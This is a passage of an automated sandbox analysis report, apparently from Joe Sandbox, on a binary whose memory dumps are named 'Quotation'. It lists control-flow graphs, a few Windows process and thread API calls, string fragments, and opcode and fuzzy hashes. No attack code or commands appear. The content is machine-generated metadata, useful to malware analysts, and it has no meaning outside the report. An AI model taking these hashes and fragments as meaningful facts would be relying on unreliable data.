                                                                • Opcode ID: b2ed62d12863e565e23dd7a60f1e8ac7ebc9abccbd2b155f2135e3ecb354bd64
                                                                • Instruction ID: d26a2584c83d8d4cf4415333e7b45e2a87019057f676d63522f31a7b709fbb38
                                                                • Opcode Fuzzy Hash: b2ed62d12863e565e23dd7a60f1e8ac7ebc9abccbd2b155f2135e3ecb354bd64
                                                                • Instruction Fuzzy Hash: 3D128C74B40101CBDB19AB28D491A6876EBEFC6341B20893AE405EF365CF35ED4BDB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 642 37235e79-37235e80 643 37235e82-37235e88 642->643 644 37235e89-37235f17 GetCurrentProcess 642->644 643->644 649 37235f20-37235f54 GetCurrentThread 644->649 650 37235f19-37235f1f 644->650 651 37235f56-37235f5c 649->651 652 37235f5d-37235f91 GetCurrentProcess 649->652 650->649 651->652 654 37235f93-37235f99 652->654 655 37235f9a-37235fb5 call 37236067 652->655 654->655 658 37235fbb-37235fea GetCurrentThreadId 655->658 659 37235ff3-37236055 658->659 660 37235fec-37235ff2 658->660 660->659
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 37235F06
                                                                • GetCurrentThread.KERNEL32 ref: 37235F43
                                                                • GetCurrentProcess.KERNEL32 ref: 37235F80
                                                                • GetCurrentThreadId.KERNEL32 ref: 37235FD9
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: 40a41a62e3a4aaae77dce43259ceb0903532c8de51f8f30e18cc3d07471392f2
                                                                • Instruction ID: 7e3682716e683ee1aebbf3c3601b0e7c2267cd1d28dfef081c6d3217c9abd6ee
                                                                • Opcode Fuzzy Hash: 40a41a62e3a4aaae77dce43259ceb0903532c8de51f8f30e18cc3d07471392f2
                                                                • Instruction Fuzzy Hash: F25144B09013499FDB45DFAAC548BEEBBF1FF49310F208459E009A7261D738A984CFA5

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 667 37235e88-37235f17 GetCurrentProcess 672 37235f20-37235f54 GetCurrentThread 667->672 673 37235f19-37235f1f 667->673 674 37235f56-37235f5c 672->674 675 37235f5d-37235f91 GetCurrentProcess 672->675 673->672 674->675 677 37235f93-37235f99 675->677 678 37235f9a-37235fb5 call 37236067 675->678 677->678 681 37235fbb-37235fea GetCurrentThreadId 678->681 682 37235ff3-37236055 681->682 683 37235fec-37235ff2 681->683 683->682
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 37235F06
                                                                • GetCurrentThread.KERNEL32 ref: 37235F43
                                                                • GetCurrentProcess.KERNEL32 ref: 37235F80
                                                                • GetCurrentThreadId.KERNEL32 ref: 37235FD9
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294489716.0000000037230000.00000040.00000800.00020000.00000000.sdmp, Offset: 37230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_37230000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: 1526f29320692d199ebff2da0fa02e1653d6f98c1d9ace3c705211dccf1584ac
                                                                • Instruction ID: c21534083206adcdde875b30af746c48acf75a672899e2a5d9d28203ec341b9b
                                                                • Opcode Fuzzy Hash: 1526f29320692d199ebff2da0fa02e1653d6f98c1d9ace3c705211dccf1584ac
                                                                • Instruction Fuzzy Hash: 7E5135B09013499FDB44DFAAD548BAEBBF5FF49310F208459E009A7361D738A980CFA5

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 690 36d591e8-36d5920d 691 36d5920f-36d59212 690->691 692 36d59214-36d59233 691->692 693 36d59238-36d5923b 691->693 692->693 694 36d59241-36d59256 693->694 695 36d59afb-36d59afd 693->695 701 36d5926e-36d59284 694->701 702 36d59258-36d5925e 694->702 696 36d59b04-36d59b07 695->696 697 36d59aff 695->697 696->691 700 36d59b0d-36d59b17 696->700 697->696 707 36d5928f-36d59291 701->707 704 36d59260 702->704 705 36d59262-36d59264 702->705 704->701 705->701 708 36d59293-36d59299 707->708 709 36d592a9-36d5931a 707->709 710 36d5929d-36d5929f 708->710 711 36d5929b 708->711 720 36d59346-36d59362 709->720 721 36d5931c-36d5933f 709->721 710->709 711->709 726 36d59364-36d59387 720->726 727 36d5938e-36d593a9 720->727 721->720 726->727 732 36d593d4-36d593ef 727->732 733 36d593ab-36d593cd 727->733 738 36d593f1-36d59413 732->738 739 36d5941a-36d59424 732->739 733->732 738->739 740 36d59434-36d594ae 739->740 741 36d59426-36d5942f 739->741 747 36d594b0-36d594ce 740->747 748 36d594fb-36d59510 740->748 741->700 752 36d594d0-36d594df 747->752 753 36d594ea-36d594f9 747->753 748->695 752->753 753->747 753->748
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q$$]q
                                                                • API String ID: 0-858218434
                                                                • Opcode ID: bfbd93699c536742614986076ae9e9291cd9706cda4ebdc92840c312d976989c
                                                                • Instruction ID: de125793385743939e15cbe0e6c951d6dbcc0c2ad4074e8faca49fc4336593e7
                                                                • Opcode Fuzzy Hash: bfbd93699c536742614986076ae9e9291cd9706cda4ebdc92840c312d976989c
                                                                • Instruction Fuzzy Hash: C7918F34B0021A8FDB54DB65C860B9EB3F6FF89244F108569D909EB744EF319D46CB92

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1255 36d5cfe0-36d5cffb 1256 36d5cffd-36d5d000 1255->1256 1257 36d5d023-36d5d026 1256->1257 1258 36d5d002-36d5d01e 1256->1258 1259 36d5d043-36d5d046 1257->1259 1260 36d5d028-36d5d03e 1257->1260 1258->1257 1261 36d5d08f-36d5d092 1259->1261 1262 36d5d048-36d5d08a 1259->1262 1260->1259 1265 36d5d094-36d5d096 1261->1265 1266 36d5d0a1-36d5d0a4 1261->1266 1262->1261 1267 36d5d387-36d5d390 1265->1267 1268 36d5d09c 1265->1268 1269 36d5d0a6-36d5d0e8 1266->1269 1270 36d5d0ed-36d5d0f0 1266->1270 1275 36d5d392-36d5d397 1267->1275 1276 36d5d39f-36d5d3ab 1267->1276 1268->1266 1269->1270 1273 36d5d0f6-36d5d0f9 1270->1273 1274 36d5d4cc-36d5d4d8 1270->1274 1278 36d5d103-36d5d106 1273->1278 1279 36d5d0fb-36d5d100 1273->1279 1284 36d5d32e-36d5d33d 1274->1284 1285 36d5d4de-36d5d7cb 1274->1285 1275->1276 1280 36d5d3b1-36d5d3c5 1276->1280 1281 36d5d4bc-36d5d4c1 1276->1281 1286 36d5d14f-36d5d152 1278->1286 1287 36d5d108-36d5d14a 1278->1287 1279->1278 1299 36d5d4c9 1280->1299 1301 36d5d3cb-36d5d3dd 1280->1301 1281->1299 1288 36d5d34c-36d5d358 1284->1288 1289 36d5d33f-36d5d344 1284->1289 1468 36d5d7d1-36d5d7d7 1285->1468 1469 36d5d9f2-36d5d9fc 1285->1469 1290 36d5d154-36d5d196 1286->1290 1291 36d5d19b-36d5d19e 1286->1291 1287->1286 1295 36d5d9fd-36d5da36 1288->1295 1296 36d5d35e-36d5d370 1288->1296 1289->1288 1290->1291 1302 36d5d1e7-36d5d1ea 1291->1302 1303 36d5d1a0-36d5d1af 1291->1303 1317 36d5da38-36d5da3b 1295->1317 1320 36d5d375-36d5d377 1296->1320 1299->1274 1333 36d5d401-36d5d403 1301->1333 1334 36d5d3df-36d5d3e5 1301->1334 1307 36d5d233-36d5d236 1302->1307 1308 36d5d1ec-36d5d22e 1302->1308 1310 36d5d1b1-36d5d1b6 1303->1310 1311 36d5d1be-36d5d1ca 1303->1311 1314 36d5d245-36d5d248 1307->1314 1315 36d5d238-36d5d23a 1307->1315 1308->1307 1310->1311 1311->1295 1316 36d5d1d0-36d5d1e2 1311->1316 1326 36d5d291-36d5d294 1314->1326 1327 36d5d24a-36d5d28c 1314->1327 1315->1299 1324 36d5d240 1315->1324 1316->1302 1322 36d5da3d-36d5da69 1317->1322 1323 36d5da6e-36d5da71 1317->1323 1330 36d5d37e-36d5d381 1320->1330 1331 36d5d379 1320->1331 1322->1323 1335 36d5da94-36d5da97 1323->1335 1336 36d5da73-36d5da8f 1323->1336 1324->1314 1338 36d5d296-36d5d2d8 1326->1338 1339 36d5d2dd-36d5d2e0 1326->1339 1327->1326 1330->1256 1330->1267 1331->1330 1337 36d5d40d-36d5d419 1333->1337 1342 36d5d3e7 1334->1342 1343 36d5d3e9-36d5d3f5 1334->1343 1347 36d5daa6-36d5daa8 1335->1347 1348 36d5da99 call 36d5db55 1335->1348 1336->1335 1362 36d5d427 1337->1362 1363 36d5d41b-36d5d425 1337->1363 1338->1339 1351 36d5d2e2-36d5d324 1339->1351 1352 36d5d329-36d5d32c 1339->1352 1353 36d5d3f7-36d5d3ff 1342->1353 1343->1353 1357 36d5daaf-36d5dab2 1347->1357 1358 36d5daaa 1347->1358 1367 36d5da9f-36d5daa1 1348->1367 1351->1352 1352->1284 1352->1320 1353->1337 1357->1317 1368 36d5dab4-36d5dac3 1357->1368 1358->1357 1371 36d5d42c-36d5d42e 1362->1371 1363->1371 1367->1347 1382 36d5dac5-36d5db28 call 36d56648 1368->1382 1383 36d5db2a-36d5db3f 1368->1383 1371->1299 1376 36d5d434-36d5d450 call 36d56648 1371->1376 1400 36d5d452-36d5d457 1376->1400 1401 36d5d45f-36d5d46b 1376->1401 1382->1383 1395 36d5db40 1383->1395 1395->1395 1400->1401 1401->1281 1405 36d5d46d-36d5d4ba 1401->1405 1405->1299 1470 36d5d7e6-36d5d7ef 1468->1470 1471 36d5d7d9-36d5d7de 1468->1471 1470->1295 1472 36d5d7f5-36d5d808 1470->1472 1471->1470 1474 36d5d9e2-36d5d9ec 1472->1474 1475 36d5d80e-36d5d814 1472->1475 1474->1468 1474->1469 1476 36d5d816-36d5d81b 1475->1476 1477 36d5d823-36d5d82c 1475->1477 1476->1477 1477->1295 1478 36d5d832-36d5d853 1477->1478 1481 36d5d855-36d5d85a 1478->1481 1482 36d5d862-36d5d86b 1478->1482 1481->1482 1482->1295 1483 36d5d871-36d5d88e 1482->1483 1483->1474 1486 36d5d894-36d5d89a 1483->1486 1486->1295 1487 36d5d8a0-36d5d8b9 1486->1487 1489 36d5d9d5-36d5d9dc 1487->1489 1490 36d5d8bf-36d5d8e6 1487->1490 1489->1474 1489->1486 1490->1295 1493 36d5d8ec-36d5d8f6 1490->1493 1493->1295 1494 36d5d8fc-36d5d913 1493->1494 1496 36d5d915-36d5d920 1494->1496 1497 36d5d922-36d5d93d 1494->1497 1496->1497 1497->1489 1502 36d5d943-36d5d95c call 36d56648 1497->1502 1506 36d5d95e-36d5d963 1502->1506 1507 36d5d96b-36d5d974 1502->1507 1506->1507 1507->1295 1508 36d5d97a-36d5d9ce 1507->1508 1508->1489
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q
                                                                • API String ID: 0-182748909
                                                                • Opcode ID: 974f387b8b2487b89f8da52b1d329ec40e651031e4c2e81211ca99a67f25bced
                                                                • Instruction ID: 392d68941fbeeb61622b20a675cf64af609e10c4eaa709f93bb2b380c16450aa
                                                                • Opcode Fuzzy Hash: 974f387b8b2487b89f8da52b1d329ec40e651031e4c2e81211ca99a67f25bced
                                                                • Instruction Fuzzy Hash: 52627A34A0020A8FCB15DF68D590A4DBBB6FF84304B218A69D0499F769DB75ED4BCF84

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1657 15a1d1-15a1de 1658 15a1e0-15a1e3 1657->1658 1659 15a1e4-15a1ea 1658->1659 1660 15a16e-15a16f 1658->1660 1661 15a1ec-15a1ef 1659->1661 1665 15a170 1660->1665 1663 15a1f1-15a200 1661->1663 1664 15a20b-15a20e 1661->1664 1674 15a206 1663->1674 1675 15a4cb 1663->1675 1666 15a210-15a219 1664->1666 1667 15a22b-15a22e 1664->1667 1665->1665 1669 15a21f-15a226 1666->1669 1670 15a4ea-15a4f0 1666->1670 1671 15a234-15a237 1667->1671 1672 15a4ce-15a4d7 1667->1672 1669->1667 1676 15a26c-15a26f 1671->1676 1677 15a239-15a267 1671->1677 1672->1666 1673 15a4dd-15a4e7 1672->1673 1674->1664 1675->1672 1678 15a271 1676->1678 1679 15a282-15a284 1676->1679 1677->1676 1750 15a274 call 15a500 1678->1750 1751 15a274 call 15a4f2 1678->1751 1681 15a286 1679->1681 1682 15a28b-15a28e 1679->1682 1681->1682 1685 15a294 1682->1685 1686 15a1b9-15a1bc 1682->1686 1684 15a27a-15a27d 1684->1679 1690 15a29e-15a2a2 1685->1690 1688 15a1c6-15a1c9 1686->1688 1689 15a1be-15a1c3 1686->1689 1688->1661 1691 15a1cb 1688->1691 1689->1688 1748 15a2a5 call 15a500 1690->1748 1749 15a2a5 call 15a4f2 1690->1749 1691->1657 1692 15a2ab-15a2ae 1693 15a2ba-15a2bc 1692->1693 1746 15a2bf call 15dc98 1693->1746 1747 15a2bf call 15dca8 1693->1747 1694 15a2c5-15a2c7 1694->1675 1695 15a2cd-15a2db 1694->1695 1695->1675 1697 15a2e1-15a33e 1695->1697 1703 15a344-15a397 1697->1703 1704 15a40f-15a429 1697->1704 1722 15a3b7-15a3da call 1579dc 1703->1722 1723 15a399-15a3b5 1703->1723 1709 15a42b-15a42f 1704->1709 1711 15a431-15a43e 1709->1711 1712 15a440 1709->1712 1713 15a445-15a447 1711->1713 1712->1713 1715 15a4b3-15a4c5 1713->1715 1716 15a449-15a44b 1713->1716 1715->1675 1715->1697 1717 15a44d-15a457 1716->1717 1718 15a459 1716->1718 1721 15a45e-15a460 1717->1721 1718->1721 1721->1715 1724 15a462-15a464 1721->1724 1735 15a3dc-15a40d 1722->1735 1723->1735 1724->1715 1725 15a466-15a4ac 1724->1725 1725->1715 1735->1709 1746->1694 1747->1694 1748->1692 1749->1692 1750->1684 1751->1684
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @1I6$@1I6$]
                                                                • API String ID: 0-2169399820
                                                                • Opcode ID: d26cb4e2f36f21e7f19e2f6f13b882d8ff492c5586af5de30e094b44f73a3991
                                                                • Instruction ID: da6ae2b4dec0cbd10180ded14fe3bf37a1515cfea10528a78c05ed88f93e25b7
                                                                • Opcode Fuzzy Hash: d26cb4e2f36f21e7f19e2f6f13b882d8ff492c5586af5de30e094b44f73a3991
                                                                • Instruction Fuzzy Hash: B5B19D34A80204CFCB14DFA4C994AADBBF2EF89311F648625E816EB365DB35DC46CB41

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1752 36d5afb0-36d5afce 1753 36d5afd0-36d5afd3 1752->1753 1754 36d5afd5 call 36d5b2ba 1753->1754 1755 36d5afe2-36d5afe5 1753->1755 1758 36d5afdb-36d5afdd 1754->1758 1756 36d5afe7-36d5afeb 1755->1756 1757 36d5aff2-36d5aff5 1755->1757 1759 36d5afed 1756->1759 1760 36d5b00b-36d5b046 1756->1760 1761 36d5aff7-36d5b001 1757->1761 1762 36d5b002-36d5b005 1757->1762 1758->1755 1759->1757 1767 36d5b04c-36d5b058 1760->1767 1768 36d5b239-36d5b24c 1760->1768 1762->1760 1763 36d5b26e-36d5b271 1762->1763 1765 36d5b294-36d5b296 1763->1765 1766 36d5b273-36d5b28f 1763->1766 1769 36d5b29d-36d5b2a0 1765->1769 1770 36d5b298 1765->1770 1766->1765 1775 36d5b078-36d5b0bc 1767->1775 1776 36d5b05a-36d5b073 1767->1776 1771 36d5b24e 1768->1771 1769->1753 1773 36d5b2a6-36d5b2b0 1769->1773 1770->1769 1777 36d5b24f 1771->1777 1784 36d5b0be-36d5b0d0 1775->1784 1785 36d5b0d8-36d5b117 1775->1785 1776->1771 1777->1777 1784->1785 1788 36d5b11d-36d5b1f8 call 36d56648 1785->1788 1789 36d5b1fe-36d5b213 1785->1789 1788->1789 1789->1768
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: DRI6$XM$XM
                                                                • API String ID: 0-4123182341
                                                                • Opcode ID: e4dc9b0a3b42f7098c90ada5355c7a6cc0815ab4ca6838b0accf323113611884
                                                                • Instruction ID: dff9027fa2f54a1fbdf2e2bdc558d9cdadda4442f3570760d26e08ac044040f4
                                                                • Opcode Fuzzy Hash: e4dc9b0a3b42f7098c90ada5355c7a6cc0815ab4ca6838b0accf323113611884
                                                                • Instruction Fuzzy Hash: C1718C30E0031A8FDF18DFA9C49069EBBB6EF85304F218629E509AB754DB75D846CB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1813 36d54c10-36d54c34 1814 36d54c36-36d54c39 1813->1814 1815 36d54c3f-36d54d37 1814->1815 1816 36d55318-36d5531b 1814->1816 1836 36d54d3d-36d54d8a call 36d554b8 1815->1836 1837 36d54dba-36d54dc1 1815->1837 1817 36d5531d-36d55337 1816->1817 1818 36d5533c-36d5533e 1816->1818 1817->1818 1820 36d55345-36d55348 1818->1820 1821 36d55340 1818->1821 1820->1814 1823 36d5534e-36d5535b 1820->1823 1821->1820 1850 36d54d90-36d54dac 1836->1850 1838 36d54e45-36d54e4e 1837->1838 1839 36d54dc7-36d54e37 1837->1839 1838->1823 1856 36d54e42 1839->1856 1857 36d54e39 1839->1857 1853 36d54db7 1850->1853 1854 36d54dae 1850->1854 1853->1837 1854->1853 1856->1838 1857->1856
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fbq$XPbq$\Obq
                                                                • API String ID: 0-4057264190
                                                                • Opcode ID: 72bd971719888e9d3f98ba0aa78fbfb3e339a6387a41e443aca6f06aeaa431c6
                                                                • Instruction ID: 2a4d2cebf8063efae65f860b29c2a78f2043ed04b1bd1a9f66bd9af140086c57
                                                                • Opcode Fuzzy Hash: 72bd971719888e9d3f98ba0aa78fbfb3e339a6387a41e443aca6f06aeaa431c6
                                                                • Instruction Fuzzy Hash: 44616E30E002099FEF149FA5C85479EBBF6EF88740F21852AE109AB391DF758C468F91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1916 15f930-15fa55 1935 15faf8-15fb29 call 15fb49 1916->1935 1936 15fa5b-15faa1 1916->1936 1945 15fb2f-15fb46 1935->1945 1941 15faa3-15faa7 1936->1941 1942 15faac-15faf7 1936->1942 1941->1942
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$I6U
                                                                • API String ID: 0-2887689718
                                                                • Opcode ID: a6c284affa9258c5c80f456031a08653d27daf7c54d719b1c8e96768fa7e338a
                                                                • Instruction ID: 695b61a489de305bdc548a012ee2461e35900285260739708cfbfd8cbf07feaf
                                                                • Opcode Fuzzy Hash: a6c284affa9258c5c80f456031a08653d27daf7c54d719b1c8e96768fa7e338a
                                                                • Instruction Fuzzy Hash: 5551B074A002099FCB05EFA8D595AEEBBB2FF88300F108169D045BB366DB35AD46CF55
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Te]q$Te]q
                                                                • API String ID: 0-3320153681
                                                                • Opcode ID: 5a64dea954dafdde3fd48444b48eda9ebbca035affe9b28e25c9c2819916fb7b
                                                                • Instruction ID: 15ec0ad3bb0bfe3da37f66ef53ed3cd7b5e2a6315b2036d32dbe2499c3e88026
                                                                • Opcode Fuzzy Hash: 5a64dea954dafdde3fd48444b48eda9ebbca035affe9b28e25c9c2819916fb7b
                                                                • Instruction Fuzzy Hash: 8EE13C34A00255CFDB28DB68C490AADB7F2EF89305F248529E815EF3A1DB75DD4ACB41
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q
                                                                • API String ID: 0-127220927
                                                                • Opcode ID: ec169b3fbb1cc60e055aa5f6b9595ef78c04d62a106a1a87dd359f1634fc0236
                                                                • Instruction ID: 38fa75615c9ea40c9723ea2df549b378a224012eaac18957219acdd3ee5f74c7
                                                                • Opcode Fuzzy Hash: ec169b3fbb1cc60e055aa5f6b9595ef78c04d62a106a1a87dd359f1634fc0236
                                                                • Instruction Fuzzy Hash: 7B517F34B002169FEB54DB64C860BAE73F6EF89644F108569D50AEB784DF319C06CB92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @1I6$@1I6
                                                                • API String ID: 0-380743643
                                                                • Opcode ID: bca3473107a502edbe540a1b99931e900578446df770575d2395d070b9dc7638
                                                                • Instruction ID: 4fec78df4b344db02437be6b0d94972b509ad3c261c682b4b14b85929cf1862b
                                                                • Opcode Fuzzy Hash: bca3473107a502edbe540a1b99931e900578446df770575d2395d070b9dc7638
                                                                • Instruction Fuzzy Hash: 4D313E35E106099FDF05CF65C494A9EBBF2BF8A300F118519EA06EB750EB75AC46CB44
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3294329242.0000000036D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 36D50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_36d50000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @1I6$@1I6
                                                                • API String ID: 0-380743643
                                                                • Opcode ID: 6bdfb34b2aad24c39ae729f268f4eb3cd177df2d7902cb12a99526984a4c498f
                                                                • Instruction ID: 5935920037c24fe404f890d4b327d9100bf1dec3a8a2a5eb60f476681c2c3d14
                                                                • Opcode Fuzzy Hash: 6bdfb34b2aad24c39ae729f268f4eb3cd177df2d7902cb12a99526984a4c498f
                                                                • Instruction Fuzzy Hash: B4314035E106099BDF05CF65C854A9EBBF2BF8A300F118519EA06EB750EB71EC46CB54
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @1I6$@1I6
                                                                • API String ID: 0-380743643
                                                                • Opcode ID: dfac4464ea7509a3209a1a442613953afd8c8b7143eef1cc033432c21ae57ba1
                                                                • Instruction ID: 62e8a8fb1e622412ac0bfa73ff6893df86f42034b1515063333830e01bda75c4
                                                                • Opcode Fuzzy Hash: dfac4464ea7509a3209a1a442613953afd8c8b7143eef1cc033432c21ae57ba1
                                                                • Instruction Fuzzy Hash: 57318E30E4060ADBCB05CF65D89469EFBB2EF8A300F50C619E815AB350EB709C46CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @1I6$@1I6
                                                                • API String ID: 0-380743643
                                                                • Opcode ID: 805ac59364c06f99e9133a9040bd15f50e53909b041d0efda170608c88ecec09
                                                                • Instruction ID: ccac7394c40d400a32f97a40a87a97b2bc9fe339e18c6c870623bbf9edbf3d90
                                                                • Opcode Fuzzy Hash: 805ac59364c06f99e9133a9040bd15f50e53909b041d0efda170608c88ecec09
                                                                • Instruction Fuzzy Hash: 2D215E30E4060ADBDB09CF65D89569EFBB2FF8A300F54C619E815AB250DB719C4ACB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: D0I6$D0I6
                                                                • API String ID: 0-156697385
                                                                • Opcode ID: 0bd259a18332f11db73520e3e93a070bd5ee87818b1954f6d3913a9c8b3769e5
                                                                • Instruction ID: 184ca786437b9db0444655ad8d8c003f11b8059e62478b23506ae5b2241e559e
                                                                • Opcode Fuzzy Hash: 0bd259a18332f11db73520e3e93a070bd5ee87818b1954f6d3913a9c8b3769e5
                                                                • Instruction Fuzzy Hash: 0D214131E10605DBCB19CFA4D45459EFBB2AF85310F60861AFC25BB390EB74AD49CB52
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: D0I6$D0I6
                                                                • API String ID: 0-156697385
                                                                • Opcode ID: 04b9d573b4243b727566d76ca170c131a17781632e83dce6dc7bad213cfad9fc
                                                                • Instruction ID: 117129533136a079d596cac7a217b9d952f15a45063a0f3b1618a6d1b9ff0f34
                                                                • Opcode Fuzzy Hash: 04b9d573b4243b727566d76ca170c131a17781632e83dce6dc7bad213cfad9fc
                                                                • Instruction Fuzzy Hash: 78213030E10205DBCB19CFA4D45459EBBB2AF85310F60861AE825FB290EB7499498B52
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `Q]q$`Q]q
                                                                • API String ID: 0-3952371890
                                                                • Opcode ID: d3a950a6f55b63ee504a93de31a4277a93ea8cdcfae91e9722c8666d2efbcf32
                                                                • Instruction ID: 7a68655c7b58bf7234f1fa4e4b9d1e0fbca3c6b53a654ac2f5a9d3fa21da4deb
                                                                • Opcode Fuzzy Hash: d3a950a6f55b63ee504a93de31a4277a93ea8cdcfae91e9722c8666d2efbcf32
                                                                • Instruction Fuzzy Hash: EE110474E803489FC708EFB4E581B5C7BB2EF81300F108169C448AB2A5EA745F07CB52
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3268460441.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_150000_Quotation.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `Q]q$`Q]q
                                                                • API String ID: 0-3952371890
                                                                • Opcode ID: 02d2e980bd79ec2ca4f1cf8f076a909be9866da3996434f6fb3a16e768430f4a
                                                                • Instruction ID: 439c0f4e0de2669ef6b2f47ad83d83e8063cc94cb5983f507057fcb03e4f480f
                                                                • Opcode Fuzzy Hash: 02d2e980bd79ec2ca4f1cf8f076a909be9866da3996434f6fb3a16e768430f4a
                                                                • Instruction Fuzzy Hash: D3017174E40309AFD708EFB4E585B5DBBB6EF80304F108568D4486B2A4EA345E07CB56
                                                                APIs
